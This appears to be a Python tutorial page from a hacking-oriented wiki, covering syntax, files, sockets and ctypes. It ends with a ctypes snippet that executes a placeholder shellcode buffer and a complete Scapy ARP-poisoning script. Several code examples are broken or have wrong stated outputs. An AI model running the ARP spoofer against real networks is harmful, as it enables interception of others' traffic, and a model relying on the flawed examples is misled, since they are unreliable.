Python

From Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools

Python is a high-level interpreted language (originally written in C) designed around functionality and cleanliness. It is often compared to perl in terms

of functionality and usage.

Contents

1 Strengths and Weaknesses of Python

2 Installation

3 Basic Application

3.1 Python Operators

3.2 Python Arithmetic

3.3 Python Bitwise Operators

3.4 Variable Definition

3.5 Printing and Receiving Input

3.6 Commenting

4 Modules

4.1 Third-Party and Custom Modules

4.2 Calling on a function within a module

5 Variable Operation

5.1 List Operations

5.1.1 Advanced List Operations

5.1.1.1 append()

5.1.1.2 insert()

5.1.1.3 index()

5.2 String Operations

5.2.1 strip()

5.2.2 split()

5.2.3 find()

5.3 Typecasting

6 Statements and Loops

6.1 If Statement

6.1.1 If

6.1.2 If-Else

6.1.3 If-Elif

6.2 While Loop

6.3 For Loop

7 Functions

8 Classes

9 File Handling

9.1 Opening and closing a file

9.2 Reading from a file

9.2.1 read()

9.2.2 readline()

9.2.3 readlines()

10 Socket Programming

10.1 Creating a Socket

10.2 Connecting a Socket

10.3 Binding and Accepting

10.3.1 Binding

10.3.2 Listening

10.3.3 Accepting

10.4 Sending and Receiving

56

5

6

5

6

5

6

10.4.1 Encoding

10.4.2 Sending and Receiving

10.5 SSL

11 Ctypes

11.1 Loading a Shared Object

11.2 Calling a function from a loaded Shared Object

11.3 Executing shellcode

12 Useful Libraries

12.1 Scapy

Strengths and Weaknesses of Python

Python draws strength from being convenient and simple to write. Many people view it as one of the easiest scripting languages to code in. As such,

a common usage for python is to write a 'prototype' of a program before implementing it in a heavier language like C. Furthermore, due to it's

interpretive nature, a python script is easily modified - there are no compiled binaries to disassemble and reverse-engineer.

However, the language's strengths often become weaknesses. For example, as was noted before, python is not a compiled language. This means

that it is very difficult to protect python code - every program is in its raw form, and can be freely edited and reused. There are methods, such as

code obfuscation, that can be used to protect code, but these are not foolproof. In addition, python programs tend to run inefficently, hogging more

resources than necessary - tasks like cracking, encryption, or anything that requires large numbers of computations should preferably be automated

with some other language.

One of the most pertinent drawbacks to python is it's incompatibility - as of version 3.0 of Python, a large portion of the language has been

rewritten, including many keywords being turned into functions - for example

print "hello, world!" #a keyword

would now be

print("hello, world!") #a function

Although this and other changes are relatively minor, they render python 3.0 programs incompatible with 2.6, 2.5 etc. This is further exascerbated

by the fact that many developers continue to code in 2.6.

Installation

Python development is based at it's website at python.org (http://www.python.org) . Python (in every recent incarnation) can be downloaded in the

form of Windows binaries and sources for compilation in a *nix environment. While it is currently available in versions 2.7.2 and 3.2.2, it is advised

that new programmers download the latest version so as not to learn a language that is becoming obsolete - of course, it is wise to learn the nuances

between 2.7 and 3.2 so that you can port older programs, and write programs that are compatible with older versions.

Many distributions come with python preloaded (although it may be an older version), while many more will be able to obtain python using the

package manager of their choice. For example, in Arch:

pacman -S python

Under Windows, python can either be run from the command line or under it's GUI, as installed under the Python folder of the Start menu. Under

linux, python is entirely commandline.

Python operates in two modes - the IDLE, which is an interactive python prompt, in which you can execute python statements in a manner that is

persistent within your session, but is lost when you exit. It can also be used to run a python script, which has the extension .py

To run a python script, execute:

python scriptname.py

It will be executed in the commandline.

To open the IDLE, simple type:

56

5

6

python

You should be presented with some version information and a prompt like this:

>>>

From there on, any python statement will execute as if read from a .py program. Use the exit() function to close the IDLE.

Basic Application

Python Operators

These are the basic operators of the python language, used for comparison and assignment:

= is equal to (assignment)

== equal to (comparison)

!= not equal to

> greater than

> less than

>= greater than or equal to

bitwise shift right

Variable Definition

Python variables are 'loosely typed', meaning that they don't have a set type - other languages, such as C, require the type of a variable to be

defined. For example, a variable designed to store integers must be set as an int, and will not store characters, or boolean values, or anything else -

attempting to store these in it will raise an exception.

To define a variable (x, for the sake of the argument) you use the '=' operator:

x = 12

Note that there is no definition of type. Python knows it's meant to represent a number because we put a number into it. This is both flexible and, at

times, annoying when you try to perform an operation that is invalid and it breaks.

There is a distinct difference between the '==' and '=' operators. It's important to recognise this, as getting the two mixed

up is one of the most common rookie errors in any language. '=' sets something equal to something else, whereas '=='

compares two values and returns true if they're equal.

Python does support the string datatype - that is, you can define a variable to be equal to a string of text, for example:

56

5

6

5

6

hi = "hello, world!"

Strings can be added to each other in much the same manner as numbers can - adding two strings will simply return the first string with the second

string tacked on at the end.

Another form of variable that python employs is the list. This is similar to an array in C and other languages - a list can be defined by giving a series

of values enclosed by squared brackets [ ]. Items in the list can be referenced according to index number (zero indexed) in much the same manner

as C.

Example:

list = [ " is ", "eggs", "male", "selketraz" ]

print(list)

print(list[3] + list[0] + list[2])

Output:

[" is ", "eggs", "male", "selketraz"]

selketraz is male

A string can be referred to as though it were a list - for example, in the string "hello" stored in variable 'hi', you could reference the letter 'e' by

referring to h[1]. However, python does not allow you to assign values to elements in a string.

Printing and Receiving Input

Two basic functions that are instrumental to writing python code are the print() and input() calls. print() simply prints whatever arguments you give it

to stdout, and input takes a string prompt as an argument and returns whatever input that it receives from stdin, in the form of a string.

for example:

name = input("What is your name? ")

print(name)

The snippet above would print a prompt to the screen saying "What is your name? ", and wait for input. When you press the enter key, any input

you've given it will be stored into the variable 'name'. It then prints the value of the variable 'name'.

Take notice that in versions of Python before 3.x, the input() call should be raw_input(). In the example below you can see the difference when using

input() vs raw_input() and problems that may arise.

home ~ python

Python 2.7.3 (default, Aug 1 2012, 05:14:39)

[GCC 4.6.3] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>> name = input("What is your name? ")

What is your name? admin

Traceback (most recent call last):

File "", line 1, in

File "", line 1, in

NameError: name 'admin' is not defined

>>> name = raw_input("What is your name?" )

What is your name? admin

>>> name

'admin'

It is pertinent to note that the print() call can print both the value of a variable - print(name) - or it can be supplied with a raw string - print("hello,

world!"). It's also important to remember that input() always returns a string - if you're trying to use a number from input, you'd have to typecast it,

as discussed later.

Commenting

It is possible to insert a comment, a block of text that is not interpreted by the python interpreter, into a module with the # symbol. This is not part of

the program, but exists for readability. For example:

56

5

6

5

6

5

6

5

6

5

6

5

6

print("hello, world!") #prints hello to the screen

Comments can also be made in larger, multi-line blocks by using threee double quotes at the start and end of your text.

"""Here is an example of a multi-line commentinside of a Python script.This text is not evaluated when your code is executed.Comment sections like this are a good place to hold To-Do listsand other longer text blocks"""

Modules

A module is a seperate python script (in some languages, it is called a header) that can be included in multiple programs to add functionality. This

has several uses:

code reuse - modular code can be easily imported into any script

ease of reading - it's easier to locate code in a set of modules than in one huge program

There are many python modules that are a part of the basic python framework, and can be called from anywhere. Examples include the time

module, which contains functionality for the clock and sleep functions, or the random module, which contains functionality for random generation. It

is also possible to write your own modules containing functions, and import them into a program in the same way.

In order to import a module(for example random):

import random

Third-Party and Custom Modules

In order to import one of your own custom modules or a third-party downloaded module, simply place them in the same directory and import them

in the same manner. For example, if you had written a module, my_module.py:

import my_module

Alternatively, you can install the module, integrating it into your distribution of Python. In order to install a packaged module, simply unzip the parent

directory and run the setup.py setup script:

python setup.py install

If the script is not packaged with a setup script, you can manually add it to Python's search path; when it sees the import command, the interpreter

first searches for the relevant module in the current directory, then in the standard python module directory. In unix, this is usually

"/usr/local/lib/python", so to add module 'autopwn.py':

cp ./autopwn.py /usr/local/lib/python

You would then be able to call autopwn.py from any python script with

import autopwn

Calling on a function within a module

As an example of how to call functions from within modules, we will use the time module. The syntax for calling a function stored in a module is:

modulename.functionname(argument)

Likewise, to reference a variable from a module:

modulename.variablename

56

5

6

5

6

5

6

5

6

To illustrate this, in order to use the sleep() function from the time module:

import timetime.sleep(50) #sleep 50 seconds

Variable Operation

List Operations

Using the string module, it is possible to perform a variety of transformations to strings that go beyond the basic concatenation and indexing

functionality that python provides.

Although we have seen that it is possible to reference a character in a string by its indexed position, it is possible to extend this. By including a

colon : in the square brackets, we can indicate a range of characters(or other elements) to select. This functionality does not require the string

module.

for example:

test_str = "hello, world!"

print (test_str[0:5])

print(test_str[:7])

print(test_str[-2:]

output:

hello,

hello, w

d!

As we can see here, it follows a few basic rules:

[n:x] select characters from position n to position x

[:n] select characters from the beginning of the string up to position n

[n:] select characters from position n to the end of the string

[-n:] select characters from n to the end of the string, starting from the right (note: when starting from the right, it is not considered to be zero-

indexed)

Advanced List Operations

append()

Syntax:

list.append(item)

Append 'item' to list 'list'.

insert()

Syntax:

list.insert(index,item)

Instrt 'item' into 'list' at position 'index'.

index()

Syntax:

return = list.index(match)

56

5

6

5

6

5

6

5

6

Returns the index value of the first value of 'list' whose value is equal to 'match' into 'return'.

String Operations

Using the string module, it is possible to perform a variety of transformations to strings that go beyond the basic concatenation and indexing

functionality that python provides.

strip()

Syntax:

strname.strip("phrase")

Strips out every instance of "phrase" from the string 'strname'

split()

Syntax:

list = strname.split("delimiter")

Splits 'strname' into a list of elements seperated by the delimiter given as an argument and returns it into 'list'. By default, the delimiter is " ".

For example:

string1 = "#hardchatz all day erryday"list = string1.split('a')

print(list)

output:

['#h', 'rdch', 'tz ', 'll d', 'y erryd', 'y']

find()

Syntax:

int = strname.find("match")

Searches for an instance of "match" in string 'strname', and returns -1 to 'int' if false.

Typecasting

In many cases, we are presented with a variable that has the wrong datatype - a common example would be the return value of the input() call. It

always returns a string, as in this example:

#calculatornum1 = input("Enter first number: ")num2 = input("Enter second number: ")

print(num1 + num2)

The above snippet of code looks like it should work, and will execute without errors. However, if for example you put in the numbers 1 and 4 to

add together, as output you will be given: 14.

The reason for this is that input() returns a string. When you try to add num1 and num2, python sees the following:

num1 + num2

'1' + '4'

'14'

56

5

6

5

6

5

6

In order to solve it, you must convert the string containing the number into an actual integer:

#calculatornum1 = input("Enter first number: ")num2 = input("Enter second number: ")

print(int(num1) + int(num2))

Typecasting functions:

int() returns the argument as an integer

str() returns the argument as a string

Note that this is not technically typecasting in the traditional sense as the functions actually convert the arguments, but it serves the same purpose.

Statements and Loops

Without some form of control flow, any python program is just a series of executed commands. Python, like almost every other programming

language, employs loops and statements to create forks in program execution depending on circumstance.

If Statement

One of the most vital statements, If is used in almost every program. Expect to get familiar with it! The if statement is used in three flavors: If, If-Else

and If-Elif (and combinations there of, e.g If-Elsif-Else).

If

The simple if statement simply checks whether a condition is met - if it is, it executes some code, otherwise it continues.

Syntax:

x = input("X: ")

if int(x) > 4: print("x is greater than 4.")

Note the whitespace before the print call - this is how the interpreter knows which code is part of the if statement and which code is to be executed

after the if statement is done. Standard whitespace is either 1 tab or 4 spaces.

If-Else

If-Else will execute in much the same way as the basic if statement, but with a form of exception handling: it will execute one set of instructions if the

condition is met, and will execute another if it is not.

Syntax:

x = input("X: ")

if int(x) > 4: print("x is greater than 4.")

else: print("x is not greater than 4.")

Again, note the use of whitespace.

If-Elif

Elif is short for "Else-If", and the If-Elif statement does exactly that. Instead of writing:

Syntax:

if int(condition): code

else: if (condition): code

56

5

6

5

6

5

6

5

6

You can use if-elif to condense this, like so:

x = input("X: ")

if int(x) > 4: print("x is greater than 4.")

elif int(x) == 4: print("x is equal to 4.")

elif int(x) < 4: print("x is less than 4.")

While Loop

The function of the while loop is to execute an if statement endlessly until the specified condition is no longer met.

Syntax:

x = 0

while x < 20: print(x) x = x + 1

The above snippet of code will endlessly print the value of x, and then increase it by 1, until x is equal to or greater than 20.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

Keep in mind that while loops with lots of nested If-Elif statements are a great way to hog resources..

If you have a situation that requires a loop to be continuously executed, you can use statements that will always be evaluated as True. This is

occasionally utilized for command line prompts, although prompts are better created by using the Python module 'Cmd'. You can use 'break' to exit

out of a continuous loop.

prompt = "cmd => "

while True: command = input(prompt) if command == "exit!": break else: os.system(command)

For Loop

For is one of the more complicated loops (though still quite simple to use) that can be confusing to those used to other languages, as the for loop in

python differs from the for loop in C.

Syntax:

for local in sequence: code

The for loop allows you to specify a list, and assign a temporary local variable (in the case above, it is 'local') that represents the current item. For

example, to increase every value in a list by 1:

list1 = [1,2,3,4,5,6,7,8,9,10]

for item in list1: item = item + 1

print(list1)

output:

[2, 3, 4, 5, 6, 7, 8, 9, 10, 11]

56

5

6

5

6

5

6

Functions

Functions have been briefly touched on before when referring to the commands that you pass to python in order to execute code: for example:

print(), int(), and input() are all examples of functions. We have also referred to functions from imported module, for example the time module's

sleep() function.

To define a function, use the def statement:

def function_name(arguments): code to be executed

For example, for a function to add one to any number given to it as input:

def addone(in_var): in_var = in_var + 1 return in_var

This layout, like the for loop's function, can be confusing. In C and other languages, you return a numeric value (which acts as an error code for the

function) and you take both input and output variables as arguments. In python, however, you only take input variables as functions, and you can

return anything - in fact, you often have to in order to have any output. Returning instantly ends the function, so it's a good way to break out of an if

statement or while loop without executing the code after it.

The variables that you refer to in the arguments section of the function definition are temporary local variables, much like those of a for loop. For

example, if you called addone() with addone(x), then for that execution the function would look like this:

def addone(x): x = x + 1 return x

It should also be noted that any variables declared within the function are considered local variables, even if there is a global variable of the same

name. A global variable is one that exists throughout the entire program, whereas a local variable exists only in the function it's defined in. For

example. if you define variable x in a function, then try to call on x after the function ends, you will receive an error - x does not exist outside of that

function. In order to call a glboal variable within a function, you must set it with the global type:

number = 7

def func(): global number number = 9

print(number)

output:

9

Classes

A class is an object archetype that groups common elements, similar to a struct in C.

When a class is defined, an initialisation function, __init__(), must be defined. This takes the first argument as self and any further arguments to the

class. The purpose of __init__() is to convert the arguments to the class into self.argument variables. This is necessary so that functions within the

class can reference these arguments by including self as an argument and referencing self.argument.

To define a function that is an element of a class, simply give it self as its first argument and it can use any of the self.argument variables. You can

also provide additional arguments to the function.

For example, a to create a class 'message' that stores messages and contains a function to print them:

35

6

5

6

5

6

class message: #defines a class called message def __init__(self, text): #defines the initialisation function that takes arguments from the class instance creation self.text = text #converts the text argument ino a variable that is an element of the instance of the class, self.text def print(self): #a function that prints self.text print(self.text) instance = message("this is my message")

print (instance.text)instance.print()

File Handling

As long as your program only interfaces with itself, it can never interact with other applications or store the results of its work - one way of designing

persistent programs is to have them save data to and read data from a file. This is where some of the real power of a scripting language can be seen,

as in python this is incredibly easy.

Opening and closing a file

In order to interact with a file in python, you create a new object that represent the file within your program, known as the file object or file

descriptor. The open() call is used to open a file, and it returns a file descriptor that you can use to read from and write to this file.

Syntax:

fd = open(path, mode)

This opens a file where 'fd' is a variable that will become the file descriptor, 'path' is a string containing the path to the file, and 'mode' is a string

containing the access mode for opening. Different access modes are used for different types of file access.

Access Modes:

r: read-only permission

w: overwrite-only permission

a: write-append permission

r+: read and overwrite permission

for example:

fd = open("~/file.txt", "r+")

To close a file descriptor once you're done with it, simply call the close() function, which takes an fd as its argument.

Once a file is open, you can apply a variety of functions to its file descriptor to read and write what it contains.

Reading from a file

There are several functions used for reading from a file. For each of them, the function is called as an element of the file descriptor:

fd.function()

read()

read() simply reads data directly from a file into a buffer. It can be called without an argument, in which case it reads the entire file, or it can be given

an integer limit (in bytes) of how much data to read.

Example:

fd = open("~/test.txt", "r+")buffer = fd.read(1000)

readline()

56

5

6

5

6

Similar to read(), the readline() function returns a new line from the file each time it is called. It can be easily incorporated into a while loop to read

every line of a file, although the readlines() function eliminates the need for this. If asked to read a new line when it has reached the end of file, it

returns an empty string, .

Example:

fd = open("~/test.txt", "r+") #printing a file line by linebuffer = "\n"

while buffer != "": buffer = fd.readline() print(buffer)

readlines()

As mentioned before, readlines() reads each line of a file, and stores the output in a list.

Example:

fd = open("~/test.txt", "r+") #printing a file line by line buf_list = fd.readlines()

for item in buf_list: print(item)

Socket Programming

Alhough socket programming can be complicated and counter-intuitive in any language, python is one of the easiest to do this in. A socket is a kind

of file descriptor that is used to refer to a network connection made between the computer, often known as the client, and any remote host. Socket

programming in python is somewhat similar to file manipulation - in effect, it is the concept of files and file descriptors implemented in such a way

that a connection is considered to be a file. This is instrumental to the UNIX philosophy.

In order to use the socket functions, you must import the socket module.

Creating a Socket

The socket function from the socket module is used to open a new socket in much the same way that open() is used to open files. It takes two

arguments: the socket family and the socket type.

Socket Families:

AF_INET: IPv4 (you will probably use this)

AF_INET6: IPv6

AF_UNIX: unix domain

Socket Types:

SOCK_STREAM: TCP, used for secure connections with little packet loss

SOCK_DGRAM: UDP, used for many games and utilities

SOCK_RAW: a raw socket

Example:

#creates a socket intended to connect to a server

import socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

Much like files, sockets are closed with the close() function from the socket module.

Connecting a Socket

Once a socket has been created, you have opened a raw filed descriptor that python knows is intended to represent a specific type of network

connection. After this, it is necessary to connect the socket to a remote host. This is done with the connect() function.

56

5

6

3 4

5

6

5

6

Note: If you are setting up a host rather than a client, you will need to read Binding and Accepting.

The connect() function takes two arguments - the hostname in string form, and a port number to connect to in integer form.

Example:

#expanding our example to connect to blackhat academy's irc

import socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAMsock.connect(("irc.blackhatacademy.org", 6697)) #this is not a typo, you must use 2 sets of parentheses

If you are the client of your connection, you need not worry about Binding and Accepting, and can move on to Sending and Receiving.

Binding and Accepting

This is only relevant if your socket is intended to be a host.

Binding

If you are planning to accept incoming connections, you must bind your socket. Whereas connecting forms a connection with a remote socket,

binding tells your socket to that it should use a specific port when looking for incoming connections.

You bind a socket using the bind() function, which takes 2 arguments: the hostname that you wish to bind to, and the port you wish to bind to. In

general, the hostname will be your hostname, so you can use the gethostbyname() function from the socket module as the hostname argument. Once

it is bound to your hostname and to a specific port, the socket knows that when told to listen, it should listen at that port.

Example:

#simple program in preparation for accepting connections on port 31337

import socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.bind(socket.gethostbyname(), 31337)

Listening

Once the socket is bound to a port, you must tell it to listen at that port. "Listening" refers to monitoring a port so that it can handle anything that tries

to connect to that port. The listen() function does this, listening to connection attempts. It takes one argument, an integer value representing the

maximum number of queued connection attempts to hold before dropping older ones.

Example:

#simple program in preparation for accepting connections on port 31337, it now listens for incoming connections

import socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.bind(socket.gethostbyname(), 31337)server.listen(1) #listen at port 31337 and queue only 1 connection at a time

After a connection is made, it must be accepted.

Accepting

listen() finds connection attempts, but you must use then accept them to form a connection between your host and the remote client. You use the

aptly-named accept() function in order to do this.

#program that listens for connections on port 31337, and then accepts

import socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.bind(socket.gethostbyname(), 31337)server.listen(1) #listen at port 31337 and queue only 1 connection at a timeconnection, sock_addr = sock.accept()

As you can see, the accept() function creates an entirely new socket - your original socket (in this case 'sock') can continue listening for new

connections, while the newly created socket (in this case 'connection') can be used to send and receive data from the client.

56

5

6

5

6

5

6

Sending and Receiving

Whether you have connected to a remote host or accepted a connection from a client, sending and receiving are what allow data to be transferred.

The send() and recv() functions from the socket module are basically identical - the only difference is whether data is being sent or received.

Encoding

See: Byte

You CANNOT send a string over a socket in python. Instead, you must first encode it in binary format. It is decoded and turned into text, or

whatever it is intended to be, at the receiving end. Likewise, any data that you receive will be encoded.

Sending and Receiving

After encoding data, the send() and recv() can be used for their respective purposes. They both take one argument - send() takes the data to be

sent as an argument, whereas recv() takes the number of bytes to be received as an argument. recv() returns the data received.

#a program to connect to BHA irc

import socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAMsock.connect(("irc.blackhatacademy.org", 6697)) #this is not a typo, you must use 2 sets of parenthesesnickname = "NICK Eschaton\r\n" #here we encode our nick requestencoded_nick = bytes(nickname, 'utf-8')sock.send(encoded_nick) #here we send our nick requestusername = "USER Neo {0} Neo :m4tr1c3s\r\n".format(server) #here we encode our username request

encoded_user = bytes(username, 'utf-8')sock.send(encoded_user) #here we send our username request#etc...

SSL

Implementing SSL is surprisingly easy in python. In addition to the socket module, the ssl module must also be important to provide the functionality.

After defining your socket, you use the wrap_socket() function from the ssl module to make a clone of the original socket with SSL functionality.

import socket

import sslbase_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock = ssl.wrap_socket(base_sock)#etc...

Ctypes

ctypes is a foreign function module. It provides C-compatible datatypes such as int and char and allows functions from C shared objects to be

called.

Loading a Shared Object

The ctypes modules contains the CDLL() function for loading shared objects. For example, to load the C libraries:

import ctypeslibc = ctypes.CDLL("libc.so.6")

The creates an instance 'libc' with the functions from the shared library libc.so.6 (the linux C shared library), meaning that you can now call functions

from libc.

Calling a function from a loaded Shared Object

To call a function from the loaded instance of libc, do:

libc.printf(bytes("hello, world!\n", 'utf-8')) #calls the C function printf

Note that in order to pass a string argument to a C function, you must encode it as binary.

56

3

3

5

6

5

Executing shellcode

Executing shellcode in Python using the Ctypes library is very straight forward:

import ctypespayload = "\x00\x00\x00\x00\x00\x00"memory = ctypes.create_string_buffer(payload, len(payload))shellcode = ctypes.cast(memory, ctypes.CFUNCTYPE(ctypes.c_void_p))shellcode()

If you need to trim down on space, you can use: from ctypes import * and all the functions can be called without the preceeding ctypes. flag.

Useful Libraries

Python has many useful libraries that can aid in writing security tools. One is Scapy (https://www.secdev.org/projects/scapy/) , a packet

manipulation and sniffing library.

Scapy

Scapy is in most distribution's repositories under scapy or python-scapy and it must be ran as root for most (if not all) operations. Sniffing in scapy is

fairly straight forward using the sniff() function:

sniff(prn=lambda pkt:callback_function(pkt), store=0) # pkt is the variable to assign the packet to and callbac

Packet crafting can be done by creating each header, ethernet headers (include source and destination MAC addresses) using Ether(), IP headers

(which include information such as source and destination IP addresses) via the IP() function. If it is a TCP packet, the TCP() function is used, and if

it is UDP, the UDP() function. An example of a GET request:

pkt = Ether()/IP(dst="www.blackhatlibrary.net")/TCP()/"GET /Python HTTP\1.1\n\n" # most arguments for the functsend(pkt)

The actual packet can be dumped by:

>>> hexdump(pkt)0000 00 25 84 FC EF CA 00 26 C7 0A F3 78 08 00 45 00 .%.....&...x..E.0010 00 3D 00 01 00 00 40 06 7D D5 AC 11 03 8F C7 1B .=....@.}.......0020 86 29 00 14 00 50 00 00 00 00 00 00 00 00 50 02 .)...P........P.0030 20 00 9E ED 00 00 47 45 54 20 2F 50 79 74 68 6F .....GET /Pytho0040 6E 20 48 54 54 50 01 2E 31 0A 0A n HTTP..1..

Many tools can be created using scapy, to demonstrate the simplicity, here is an example of an ARP spoofing script:

#!/usr/bin/python

import sys, os, time

from scapy.all import * # ARP ping to get the original MAC addresses

def get_original_macs(ip): ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip),timeout=2) for snd,rcv in ans: return rcv.sprintf("%Ether.src%") # restore ARP tables (so the machines can actually connect)

def restore_original_state(spoofed_ip, victim, spoofed_mac, victim_mac): send(ARP(op=2, psrc=spoofed_ip, pdst=victim, hwdst="ff:ff:ff:ff:ff", hwsrc=spoofed_mac)) send(ARP(op=2, psrc=victim, pdst=spoofed_ip, hwdst="ff:ff:ff:ff:ff", hwsrc=victim_mac)) # Initiate ARP poisoning

def arp_poison(spoofed_ip, victim): send(ARP(op=2, psrc=spoofed_ip, pdst=victim, hwdst="ff:ff:ff:ff:ff:ff")) send(ARP(op=2, psrc=victim, pdst=spoofed_ip, hwdst="ff:ff:ff:ff:ff:ff"))

def main(): if os.geteuid() != 0: print "Please run as root." exit() if len(sys.argv) != 3:

6 print "Usage: " + sys.argv[0] + " " exit() print "Poisoning: " + sys.argv[2] print "Faked IP: " + sys.argv[1] print "\nPress ctrl+c to exit." try: spoofed_mac = get_original_macs(sys.argv[1]) victim_mac = get_original_macs(sys.argv[2]) except: print "Error: Unable to get MAC addresses, qutting." exit(1) while 1: try: arp_poison(sys.argv[1], sys.argv[2]) time.sleep(2) except KeyboardInterrupt: print "Caught interrupt\nRestoring network state then exiting." restore_original_state(sys.argv[1], sys.argv[2], spoofed_mac, victim_mac) exit(0)

if __name__ == "__main__": main()

Python is part of a series on programming.

[ Decompile ]

Retrieved from "http://www.blackhatlibrary.net/Python"

Categories: Programming | Interpreted languages | Administration

This page was last modified on 17 November 2012, at 08:24.

Compartir